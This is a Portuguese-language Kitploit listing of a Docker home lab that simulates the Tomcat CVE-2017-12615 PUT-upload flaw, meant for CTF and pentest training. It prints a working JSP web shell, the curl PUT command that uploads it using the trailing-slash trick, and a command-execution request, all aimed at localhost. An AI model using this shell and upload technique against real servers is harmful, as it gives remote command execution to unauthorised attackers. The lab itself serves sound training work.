Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: Execução Remota de Código via Upload de JSP - Laboratório Caseiro para Red Teaming, Testes de Penetração | Kitploit
Ferramentas/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHub
netw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Execução Remota de Código via Upload de JSP - Laboratório Caseiro para Red Teaming, Testes de Penetração

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

INGLÊS ABAIXO

CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP

image

Este laboratório simula a vulnerabilidade CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP
Ocorre devido à configuração readonly=false, que permite o upload de arquivos via HTTP PUT, incluindo arquivos .jsp que podem executar comandos (RCE).


image

Funcionalidades

  • Apache Tomcat 7.0.79 (vulnerável)
  • Sobrescrita do DefaultServlet com readonly=false
  • Possibilidade de usar PUT Upload para colocar arquivos .jsp no diretório web ROOT
  • Suporte à execução de comandos via web shell
  • Página web com estilo industrial e nota interna que foi esquecida (dica)
  • Sistema que gera flag_RANDOM.txt automaticamente toda vez que o container é iniciado
  • Projetado para CTF / Red Team / Pentest Training

  • Estrutura de Diretórios

    root@kitploit:~
    /opt/apache-tomcat-7.0.79/
    /opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
    /opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
    /tmp/flag_RANDOM.txt
    /docker-entrypoint.sh
    

    Como Usar (Executar Container)

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    Abra o navegador:

    root@kitploit:~
    http://localhost:8080/
    

    Como Testar a Vulnerabilidade CVE-2017-12615

    1) Criar um payload JSP

    root@kitploit:~
    cat > shell.jsp << 'EOF'
    <%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        String s;
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while ((s = r.readLine()) != null) out.println(s + "<br>");
    }
    %>
    EOF
    

    2) Fazer upload do arquivo com PUT (deve ter / no final do nome do arquivo)

    root@kitploit:~
    curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp
    

    3) Executar o webshell

    root@kitploit:~
    http://localhost:8080/shell.jsp?cmd=id
    

    Flag

    Armazenada em:

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Versão em Inglês — CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP

    Este laboratório simula CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP, no qual o DefaultServlet do Apache Tomcat está mal configurado com:

    root@kitploit:~
    readonly=false
    

    Isso permite que atacantes façam upload de arquivos .jsp via HTTP PUT, possibilitando execução remota de código.


    image

    Funcionalidades

    • Apache Tomcat 7.0.79 vulnerável
    • Sobrescrita do DefaultServlet com readonly=false
    • PUT Upload → escrever arquivos .jsp arbitrários no diretório web ROOT
    • Suporte à execução de comandos via shell JSP
    • Página inicial com estilo industrial e uma dica interna sutil
    • flag_RANDOM.txt gerada automaticamente na inicialização do container
    • Adequado para CTF, pesquisa e desenvolvimento de exploits

    Exemplo de Exploração

    Fazer upload de um shell JSP

    root@kitploit:~
    curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp
    

    Executar comandos

    root@kitploit:~
    http://localhost:8080/shell.jsp?cmd=id
    

    Localização da Flag

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Aviso

    Apenas para fins educacionais, de pesquisa e testes de penetração autorizados.

    Baixar ferramenta